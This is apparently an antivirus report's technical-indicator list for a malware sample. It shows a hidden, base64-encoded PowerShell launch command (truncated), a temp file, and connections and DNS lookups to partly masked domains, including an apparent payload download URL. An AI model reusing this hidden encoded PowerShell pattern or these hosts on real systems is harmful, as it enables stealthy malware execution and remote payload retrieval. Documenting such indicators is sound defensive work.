Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABTAGUAaQBtAG0AZwBoAHAAYgB3AGkAcAA9ACcASwBuAGMAeQBwAHEAYwBwAHAAagB5AG4AaQAnADsAJABLAHcAdwBxAGYAYwB5AG8AaABiAHUAcwBkACAAPQAgACcAMwAzACcAOwAkAFoAYQB3AG0AbgBiAGM...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\1225980.cvr
- 'do###queens.com':443
- 'qa##ome.com':80
- http://qa##ome.com/dlkc3/f0x0011/
- 'do###queens.com':443
- DNS ASK in####mvietnam.com
- DNS ASK do###queens.com
- DNS ASK ru###un123.com
- DNS ASK re####iasigns.com
- DNS ASK qa##ome.com